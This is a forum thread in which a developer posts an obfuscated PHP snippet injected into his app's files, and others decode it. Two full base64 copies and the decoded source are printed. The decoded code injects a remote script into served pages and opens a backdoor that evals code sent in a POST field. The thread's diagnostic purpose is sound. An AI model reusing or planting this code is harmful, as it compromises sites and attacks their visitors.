[SOLVED] Anyone have a clue what this is, it somehow appeared on a few of my scripts

[pustulio]

<?php eval(base64_decode('aWYoIWlzc2V0KCR3dzdqMSkpe2Z1bmN0aW9uIHd3N2ooJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyUmhaSFJvYVc1bkxtTnZiUzlvYjNsc2JXRnVZMjl1YzNSeWRXTjBhVzl1TG1OdmJTOXBibVJsZUhJdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB3dzdqMigkYSwkYiwkYywkZCl7Z2xvYmFsICR3dzdqMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkd3c3ajEpKWNhbGxfdXNlcl9mdW5jKCR3dzdqMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd3dzdqJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3d3N2onKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kd3c3amw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3d3N2oyJykpIT0nd3c3ajInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

 

Hey guys, I figured this would be the best place to find help on this.

A friend who was using an app I wrote a long time ago (that just tracks data in a mysql table) sent me an email that it stopped working because he got a php error. I had a look at the scripts and somehow this codesnippet found its way into the top of a few. Mainly the sql include file, the index file, and the settings file.

I echoed this out to see what it was, and it was a bunch of obfuscated code that I couldn't decipher.

 

I have a feeling its not very nice. Could anyone help me out?

[RussellReal]

it evaluates this code:

<?php
if(!isset($ww7j1)){function ww7j($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RhZHRoaW5nLmNvbS9ob3lsbWFuY29uc3RydWN0aW9uLmNvbS9pbmRleHIucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function ww7j2($a,$b,$c,$d){global $ww7j1;$s=array();if(function_exists($ww7j1))call_user_func($ww7j1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='ww7j')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ww7j');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ww7jl=(($a=@set_error_handler('ww7j2'))!='ww7j2')?$a:0;eval(base64_decode($_POST['e']));
?>

[pustulio]

cheers mate, I managed to get that far but I don't know what the purpose of the code is.

I know for a fact I didn't put it there!

[RussellReal]

do you use any free hosting service.. or is this for a blog or whatever that allows php code.. if so all this code does is check for script tags and stuff.. atleast from reading teh regex thats what I gather

[pustulio]

No we use a payed hosting service, but it is shared hosting so there are more domains on the server. Its not a blog either, only one person has access to this app and he doesn't know anything about programming.

 

When I echoed the code out in the browser, this URL managed to make an appearance: http://dadthing.com/hoylmanconstruction.com/indexr.php

 

Once again, stumped.

[f1r3fl3x]

I had a similar problem. On every page of my website there was a code similar to this, but it was only HTML. It was an iframe, pointing to a website. This was made through a hole in your host's security. You should contact them and notify them of this.

[Mchl]

Basiacally it tries to inject the script from http://dad thing.com/hoylmanconstruction.com/indexr.php into your page.

[pustulio]

Thanks heaps guys, I have emailed the our hosting about this. Hopefully they have something good to say.

[scanreg]

<?php eval(base64_decode('aWYoIWlzc2V0KCR3dzdqMSkpe2Z1bmN0aW9uIHd3N2ooJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyUmhaSFJvYVc1bkxtTnZiUzlvYjNsc2JXRnVZMjl1YzNSeWRXTjBhVzl1TG1OdmJTOXBibVJsZUhJdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB3dzdqMigkYSwkYiwkYywkZCl7Z2xvYmFsICR3dzdqMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkd3c3ajEpKWNhbGxfdXNlcl9mdW5jKCR3dzdqMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd3dzdqJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3d3N2onKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kd3c3amw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3d3N2oyJykpIT0nd3c3ajInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

 

How did you decode this?

 

Thanks

[Mark Baker]

How did you decode this?

 

Simply delete the eval() and echo the result of the base64_decode

<?php echo base64_decode('aWYoIWlzc2V0KCR3dzdqM........=='); ?>

 

[scanreg]

Ah, okay, thanks

[bossman]

that code is a hack....delete all your remote files immediately, and simply redrag your site over to the server and it will be gone...

[knsito]

that code is a hack....delete all your remote files immediately, and simply redrag your site over to the server and it will be gone...

 

Well this is a quick fix, but he should find out where the attack vector came from and have that patched. Problem could (most likey will) re-occur if the security issue is not fixed.